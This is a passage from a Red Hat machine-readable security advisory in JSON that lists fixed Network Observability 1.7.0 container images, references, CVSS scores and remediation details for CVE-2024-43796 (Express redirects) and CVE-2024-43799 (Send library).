"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43796"
},
{
"category": "external",
"summary": "RHBZ#2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43796",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43796"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43796"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553",
"url": "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553"
},
{
"category": "external",
"summary": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx",
"url": "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx"
}
],
"release_date": "2024-09-10T15:15:17.510000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "express: Improper Input Handling in Express Redirects"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:87f4f7757826faf37710a88be3c2917b855088e02acb73f43eb7a77f61d00d45_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:8bb22f295ec8087a7163997588a4af0dce8f838407aa83f8bd09190a2943ad1e_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:b875fece4d49972e278450730f90bb5defa818aa2774dfa0e15d6f36ba50c840_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:268ac72b4a0bf05893cca0924a80ebd2107f3e859329406257da6ce59ec08dfe_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:3a3c70c990bd3a012453857698433d674b98445e55cc9c5c4ed38eea29eb82b1_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:c32c5ec7c6048f652200677c2a9cbde09ed05beeb818e292f21e6a52786b0a02_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-operator-bundle@sha256:ccf531d1181ccd1c6eb9ec45ea20069aa01b2924242596f25e551d055c9a0e1b_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:349de1a5389f131933bf39235705a4aa8137a8d4be561f66aa2b74f986489fba_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:4f9cdf8c1c22a79d0690b18c363ade514262510f5fbb4062746210005e832134_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:8c5836a79d4f6562ed17db8488422db567f4a920908e1800b770ec04ffa78080_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-rhel9-operator@sha256:9c2c0e0b8f9c061983f48fca9c18d7a496d38fbc4f8b9274d2fef39a5824c40a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43799"
},
{
"category": "external",
"summary": "RHBZ#2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43799"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43799"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35",
"url": "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35"
},
{
"category": "external",
"summary": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg",
"url": "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg"
}
],
"release_date": "2024-09-10T15:15:17.727000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-22T01:05:39+00:00",
"details": "For details on how to apply this update, refer to: \n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:1587047e407a77f7ac1d963cc9bbfdb5c2472554cad8367f0a96a4699528134d_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:bd8b5a7f1f9369c1f6fe3782c79b4145c3467b3f82e083e1eb83d76a8df21fdd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-cli-rhel9@sha256:c469d89f77d04b257c6bf9814a3782540139e35c83ac73c2e5820c20ec2146fd_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:46cee52d96fee8b3f5cd151c21e5b886841cff53b4d65cb6264d39acd9c6a7cd_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:b811f8d5b133d9a90f575d23f7a91e184ef8b6d640fb0cd7732f155d40f51c86_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-console-plugin-rhel9@sha256:ccf31db5ef85f57422a16a61a5c6aea883396699e1cc8c0f6043d2fc7eb0b8e9_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:8016c95a9891094692764956dc9df211e8a0f8cdcf14e6682565d4c35325e0bf_arm64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:ae64fda5860fa3cbdd9a81d56924cd32d69fbf67804e16cc2e1e5ca6f786dd8b_s390x",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:d36488d180acdca0e6b0fbe8dbe77af3464d5b1fc3efc9440ed130fec5e71ebe_ppc64le",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"9Base-NETWORK-OBSERVABILITY-1.7.0:network-observability/network-observability-flowlogs-pipeline-rhel9@sha256:54a8042443e480f3543527d6121dbbaab57394554282b8f4fc885a1ba2b28844_arm64",
